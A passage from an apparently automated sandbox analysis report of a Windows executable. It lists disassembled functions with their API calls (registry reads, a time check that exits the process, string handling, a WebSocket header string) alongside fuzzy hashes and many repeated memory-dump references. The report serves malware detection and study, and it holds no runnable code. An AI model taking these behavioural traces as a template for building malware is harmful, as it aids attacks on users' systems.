                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: eac730a56d249aa1025e07df5e7843a1406363e420c4ea628abb55b93b2da2e3
                        • Instruction ID: b4e19877d2e5afd7b98c0638e6bba89661ce42a3a5a9cf80824cf382e6d751e0
                        • Opcode Fuzzy Hash: eac730a56d249aa1025e07df5e7843a1406363e420c4ea628abb55b93b2da2e3
                        • Instruction Fuzzy Hash: 7241D671A1010CAFCB64EF64EC46BED7774EF44304F008069BA0997291EE39AA89CF95
                        Function 00507EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00507F31
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00507F60
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00507FA5
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00507FD3
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00508007
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 08d0e26d1ea902ee72cc342039f83bd24c690f5411c01c601d9e42d8ff9ab734
                        • Instruction ID: 79ff5c512475d24dce31b296221e4dbfc0ee48b2b3fba390227c1bb48726badc
                        • Opcode Fuzzy Hash: 08d0e26d1ea902ee72cc342039f83bd24c690f5411c01c601d9e42d8ff9ab734
                        • Instruction Fuzzy Hash: 0241AE30A0411BDFDB20DF68D880EAEBBB4FF58340F114499E805DB291DB74AA66CB95
                        Function 00508050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 005080BB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005080EA
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00508102
                        • lstrlen.KERNEL32(00000000), ref: 00508140
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050816F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 113e72a709b9f8b212857571f64b0933af765c5058e24d11b5cd284fd2d8e5af
                        • Instruction ID: 00bd94d36f38be58d7e25bb88d7d0f64609a4a23d366a3e4d37e676a4feae7fa
                        • Opcode Fuzzy Hash: 113e72a709b9f8b212857571f64b0933af765c5058e24d11b5cd284fd2d8e5af
                        • Instruction Fuzzy Hash: B241797160020AABDB21DF68DA48FAEBBF4FF44300F14841DA989D7295EB34D956CB90
                        Function 00511B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00511B72
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051184F
                          • Part of subcall function 00511820: lstrlen.KERNEL32(01026048), ref: 00511860
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 00511887
                          • Part of subcall function 00511820: lstrcat.KERNEL32(00000000,00000000), ref: 00511892
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 005118C1
                          • Part of subcall function 00511820: lstrlen.KERNEL32(00524FA0), ref: 005118D3
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 005118F4
                          • Part of subcall function 00511820: lstrcat.KERNEL32(00000000,00524FA0), ref: 00511900
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 0051192F
                        • sscanf.NTDLL ref: 00511B9A
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511BB6
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511BC6
                        • ExitProcess.KERNEL32 ref: 00511BE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                        • String ID:
                        • API String ID: 3040284667-0
                        • Opcode ID: 4c3a305bdcd6aa3a1ec402e3b6a1fa913d1cafa5c31a9c1b5e2c38f7dbc390a9
                        • Instruction ID: 5f18e06812d50ce3d74de33aa00d31a45d937c2bc6dec518fbacad56dee0f644
                        • Opcode Fuzzy Hash: 4c3a305bdcd6aa3a1ec402e3b6a1fa913d1cafa5c31a9c1b5e2c38f7dbc390a9
                        • Instruction Fuzzy Hash: 9521E4B1518305AF8360DF65D88489BBBF8FFC8314F409A1EF699C3220E734D5458BAA
                        Function 00513130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00513166
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051316D
                        • RegOpenKeyExA.ADVAPI32(80000002,0102BA48,00000000,00020119,?), ref: 0051318C
                        • RegQueryValueExA.ADVAPI32(?,0103D308,00000000,00000000,00000000,000000FF), ref: 005131A7
                        • RegCloseKey.ADVAPI32(?), ref: 005131B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: a37244ae3336521251dcdabb425a0ebf3909e216619e2fef3c4843cbca28cd19
                        • Instruction ID: 89441b33ce5b1352a6f52f83423bbb1778052b478aab8ae5960dc5560da0e983
                        • Opcode Fuzzy Hash: a37244ae3336521251dcdabb425a0ebf3909e216619e2fef3c4843cbca28cd19
                        • Instruction Fuzzy Hash: 70119476A41209AFD720CF94DD49FBBBBBCF744710F008119FA05E3680DB7559018BA5
                        Function 005190DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: f0a8c89f3139d42217e5c38d79f4052a3eb6dfc65c74f8ddfb829b617d8dfd0a
                        • Instruction ID: 253b5a30e17106b72a10348c55ffbfa7fcb33c2ec0748148ff1f6e82a455fb37
                        • Opcode Fuzzy Hash: f0a8c89f3139d42217e5c38d79f4052a3eb6dfc65c74f8ddfb829b617d8dfd0a
                        • Instruction Fuzzy Hash: B141F67050475CAEEB318A248C99FFB7FFDAB45304F1448E8E59686142E2719AC5CF60
                        Function 004F8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F8996
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1D5
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F89CD
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: invalid string position$string too long
                        • API String ID: 2002836212-4289949731
                        • Opcode ID: e97d7006d26a9d4d6117c8ff37521a9f9e446776e2ac29efe622fcd3127d097f
                        • Instruction ID: 58185521f67d9669be205139112dc3c44d47880385c0fa192de2e4deb8b5520a
                        • Opcode Fuzzy Hash: e97d7006d26a9d4d6117c8ff37521a9f9e446776e2ac29efe622fcd3127d097f
                        • Instruction Fuzzy Hash: 5B21D8723006585BCB219A5CE840A7AF795DBA2761B11093FF241CF281CBB5D841C7AD
                        Function 004F8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F8883
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 84d473eaa4a915f887f26e893fab7ef0f753363b0545721cacc24f942b77c7ff
                        • Instruction ID: d2c24228d9dcea9f0a3d106c489baee197486ae4a15d5763af54aea879b7f846
                        • Opcode Fuzzy Hash: 84d473eaa4a915f887f26e893fab7ef0f753363b0545721cacc24f942b77c7ff
                        • Instruction Fuzzy Hash: E631B7B5E005199BCB08DF58C891AAEBBB6EB88350F14826DE905DF384DB34AD01CB95
                        Function 00515910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515922
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515935
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_std::exception::exception
                        • String ID: Sec-WebSocket-Version: 13$string too long
                        • API String ID: 1928653953-3304177573
                        • Opcode ID: 1245b2244951634c13fadc2d7022583c2b479b6ecf370d36cb82aa8086ca8f8a
                        • Instruction ID: 186a70226671ae5c1edf5f627a9166bf3a2a52d7c8567eb2e7c1e35e4dee7f1e
                        • Opcode Fuzzy Hash: 1245b2244951634c13fadc2d7022583c2b479b6ecf370d36cb82aa8086ca8f8a
                        • Instruction Fuzzy Hash: 54115231304B50CBE7329B2CE801B597FE1BBD2761F250A5EE0D187695E771D881CBA6
                        Function 00513CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0051A430,000000FF), ref: 00513D20
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00513D27
                        • wsprintfA.USER32 ref: 00513D37
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 5fa6b371e404821138300a4ac55fc4c27b556cd3e44181eb865362b60a8f29fa
                        • Instruction ID: 3274deda597443161aa3893570d63278485eb6ea5959fb7a2d3814cbf99c0064
                        • Opcode Fuzzy Hash: 5fa6b371e404821138300a4ac55fc4c27b556cd3e44181eb865362b60a8f29fa
                        • Instruction Fuzzy Hash: B601C071640318BBE7305B54DC4AF6ABB78FB45B61F048115FB05972D0DBB81901C6AA
                        Function 004F8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F8737
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
